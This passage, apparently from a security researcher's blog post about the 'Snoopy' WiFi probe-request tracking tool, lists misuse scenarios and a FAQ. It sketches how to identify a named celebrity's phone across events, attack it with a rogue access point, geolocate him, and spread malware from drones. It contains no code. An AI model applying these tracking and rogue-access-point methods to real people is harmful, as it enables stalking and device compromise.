Illegal -Let's pretend we want to target David Beckham. We could attend several public events at which David is attending (Drone in pocket), ensuring we are within reasonable proximity to him. We would then look for overlap of commonly observed devices over time at all of these functions. Once we get down to one device observed via this intersection, we could assume the device belongs to David. Perhaps at this point we could bring up a rogue access point that only targets his device, and proceed maliciously from there. Or just satisfy ourselves by geolocating places he frequents. -Botnet infections, malware distribution. That doesn't sound very nice. Snoopy drones could be used to infect users' devices, either by injection malicious web traffic, or firing exploits from the Snoopy server at devices. -Unsolicited advertising. Imagine browsing the web, and an unscrupulous 3rd party injects viagra adverts at the top of every visited page?


Similar tools

Immunity's Stalker and Silica Hubert's iSniff GPS

Snoopy in the Press

Risky Biz Podcast Naked Scientist Podcast(transcript) The Register Fierce Broadband Wireless

***FAQ***

Q. But I use WPA2 at home, you can't hack me! A. True - if I pretend to be a WPA[2] network association it will fail. However, I bet your device is probing for at least one open network, and when I pretend to be that one I'll get you.

Q. I use Apple/Android/Foobar - I'm safe! A. This attack is not dependent on device/manufacture. It's a function of the WiFi specification. The vast majority of observed devices were in fact Apple (>75%).

Q. How can I protect myself? A. Turn off your WiFi when you l leave home/work. Be cautions about using it in public places too - especially on open networks (like Starbucks). A. On Android and on your desktop/laptop you can selectively remove SSIDs from your saved list. As for iPhones there doesn't seem to be option - please correct me if I'm wrong? A. It'd be great to write an application for iPhone/Android that turns off probe-requests, and will only send them if a beacon from a known network name is received.

Q. Your research is dated and has been done before! A. Some of the individual components, perhaps. Having them strung together in our distributed configuration is new (AFAIK). Also, some original ideas where unfortunately published first; as often happens with these things.

Q. But I turn off WiFi, you'll never get me! A. It was interesting to note how many people actually leave WiFi on. e.g. 30,000 people at a single London station during one day. WiFi is only one avenue of attack, look out for the next release using Bluetooth, GSM, NFC, etc :P

Q. You're doing illegal things and you're going to jail! A. As mentioned earlier, the broadcast nature of probe-requests means no laws (in the UK) are being broken. Furthermore, I spoke to a BT Engineer at 44Con, and he told me that there's no copyright on SSID names - i.e. there's nothing illegal about pretending to be "BTOpenzone" or "SkyHome-AFA1". However, I suspect at the point where you start monitoring/modifying network traffic you may get in trouble. Interesting to note that in the USA a judge ruled that data interception on an open network is not illegal.

Q. But I run iOS 5/6 and they say this is fixed!! A. Mark Wuergler of Immunity, Inc did find a flaw whereby iOS devices leaked info about the last 3 networks they had connected to. The BSSID was included in ARP requests, which meant anyone sniffing the traffic originating from that device would be privy to the addresses. Snoopy only looks at broadcast SSIDs at this stage - and so this fix is unrelated. We haven't done any tests with the latest iOS, but will update the blog when we have done so.

Q. I want Snoopy! A. I'm working on it. Currently tidying up code, writing documentation, etc. Soon :-)